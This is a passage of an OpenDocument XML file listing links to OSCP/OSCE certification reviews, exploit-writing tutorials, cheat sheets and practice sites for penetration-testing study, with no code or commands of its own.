      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.giuspen.com/cherrytree/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.giuspen.com/cherrytree/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.fuzzysecurity.com/tutorials/16.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.fuzzysecurity.com/tutorials/16.html</text:a></text:p>
      <text:p text:style-name="Text_20_body">Good reviews of CTP/OSCE (in no particular order):</text:p>
      <text:p text:style-name="Text_20_body">Note: * mark means look for other posts on this blog</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://www.jollyfrogs.com" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.jollyfrogs.com</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securitysift.com/offsec-ctp-osce/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securitysift.com/offsec-ctp-osce/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://buffered.io/posts/osce-and-me/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://buffered.io/posts/osce-and-me/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.iodigitalsec.com/offensive-security-ctp-course-and-osce-certification-review/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.iodigitalsec.com/offensive-security-ctp-course-and-osce-certification-review/</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blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://infamoussyn.com/resources/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://infamoussyn.com/resources/</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www.primalsecurity.net/course-review-osce/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.primalsecurity.net/course-review-osce/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://netsec.ws/?p=517" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://netsec.ws/?p=517</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://tekwizz123.blogspot.sg/2014/09/osce-review-and-experience.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://tekwizz123.blogspot.sg/2014/09/osce-review-and-experience.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://networkfilter.blogspot.sg/2016/01/my-osce-review.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://networkfilter.blogspot.sg/2016/01/my-osce-review.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.blogtecnico.net/certificacion-osce-review-cracking-the-perimeter-ctp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.blogtecnico.net/certificacion-osce-review-cracking-the-perimeter-ctp/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://github.com/reider-roque" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/reider-roque</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="http://shell-storm.org/shellcode/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://shell-storm.org/shellcode/</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Tutorial sites (more stars = better/recommended):</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.0daysecurity.com/pentest.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.0daysecurity.com/pentest.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://ly0n.me/2015/10/19/lfi-beyond-procselfenviron/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://ly0n.me/2015/10/19/lfi-beyond-procselfenviron/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://phrack.org/issues/62/7.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://phrack.org/issues/62/7.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development--the-series" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development--the-series</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://resources.infosecinstitute.com/intro-to-fuzzing/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://resources.infosecinstitute.com/intro-to-fuzzing/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://madmantm.wordpress.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://madmantm.wordpress.com/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.fuzzysecurity.com/tutorials.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.fuzzysecurity.com/tutorials.html</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netsec.ws/?p=180" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://netsec.ws/?p=180</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://netsec.ws/?p=430" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://netsec.ws/?p=430</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://netsec.ws/?cat=57" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://netsec.ws/?cat=57</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://blog.stalkr.net/2011/04/pctf-2011-22-hashcalc1.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://blog.stalkr.net/2011/04/pctf-2011-22-hashcalc1.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://ionize.com.au/its-all-about-inclusion/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://ionize.com.au/its-all-about-inclusion/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/</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carnal0wnage.attackresearch.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://carnal0wnage.attackresearch.com/</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www.kernel-exploits.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.kernel-exploits.com/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.thegreycorner.com/2010/01/seh-stack-based-windows-buffer-overflow.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.thegreycorner.com/2010/01/seh-stack-based-windows-buffer-overflow.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.thegreycorner.com/2010/02/windows-buffer-overflow-tutorial.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.thegreycorner.com/2010/02/windows-buffer-overflow-tutorial.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.thegreycorner.com/2010/01/beginning-stack-based-buffer-overflow.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.thegreycorner.com/2010/01/beginning-stack-based-buffer-overflow.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://sites.google.com/site/xssvulnerabilities/bypassing-browser-anti-xss-filters" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://sites.google.com/site/xssvulnerabilities/bypassing-browser-anti-xss-filters</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://github.com/sploitfun/lsploits" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/sploitfun/lsploits</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.keystone-engine.org/docs/tutorial.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.keystone-engine.org/docs/tutorial.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://resources.infosecinstitute.com/analysis-of-malware-samples/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://resources.infosecinstitute.com/analysis-of-malware-samples/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.fuzzysecurity.com/tutorials/7.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.fuzzysecurity.com/tutorials/7.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://phrack.org/issues/67/13.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://phrack.org/issues/67/13.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securepla.net/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securepla.net/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://programming4.us/security/688.aspx" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://programming4.us/security/688.aspx</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://resources.infosecinstitute.com/buffer-overflow-vulnserver/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://resources.infosecinstitute.com/buffer-overflow-vulnserver/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.flinkd.org/2011/07/fuzzing-with-peach-part-1/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.flinkd.org/2011/07/fuzzing-with-peach-part-1/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://realpentesting.blogspot.sg/2013/04/0day-bug-hunting-realpentesting.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://realpentesting.blogspot.sg/2013/04/0day-bug-hunting-realpentesting.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://samsclass.info/127/proj/vuln-server.htm" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://samsclass.info/127/proj/vuln-server.htm</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.rockfishsec.com/2014/01/fuzzing-vulnserver-with-peach-3.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.rockfishsec.com/2014/01/fuzzing-vulnserver-with-peach-3.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.thegreycorner.com/p/vulnserver.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.thegreycorner.com/p/vulnserver.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://resources.infosecinstitute.com/seh-exploit/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://resources.infosecinstitute.com/seh-exploit/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Cheatsheets:</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://highon.coffee/blog/lfi-cheat-sheet/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://highon.coffee/blog/lfi-cheat-sheet/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://ethicalhacker.io/post/137403906740/osce-exam-prep" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://ethicalhacker.io/post/137403906740/osce-exam-prep</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://htmlpurifier.org/live/smoketests/xssAttacks.php" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://htmlpurifier.org/live/smoketests/xssAttacks.php</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.bnxnet.com/wp-content/uploads/2015/01/WinAPIs_for_hackers.pdf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.bnxnet.com/wp-content/uploads/2015/01/WinAPIs_for_hackers.pdf</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securepla.net/wiki/index.php?title=Cheat_Sheets" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securepla.net/wiki/index.php?title=Cheat_Sheets</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securepla.net/wiki/index.php?title=Network_Attack_Cheat_Sheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securepla.net/wiki/index.php?title=Network_Attack_Cheat_Sheet</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.securepla.net/wiki/index.php?title=Web_App_Cheat_Sheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.securepla.net/wiki/index.php?title=Web_App_Cheat_Sheet</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securepla.net/wiki/index.php?title=Web_Scanning_Cheat_Sheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securepla.net/wiki/index.php?title=Web_Scanning_Cheat_Sheet</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securepla.net/wiki/index.php?title=Malware_Cheat_Sheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securepla.net/wiki/index.php?title=Malware_Cheat_Sheet</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="http://sparksandflames.com/files/x86InstructionChart.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://sparksandflames.com/files/x86InstructionChart.html</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Good practice sites:</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="http://www.primalsecurity.net/tutorials/exploit-tutorials/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.primalsecurity.net/tutorials/exploit-tutorials/</text:a></text:p>
        </text:list-item>
        <text:list-item>
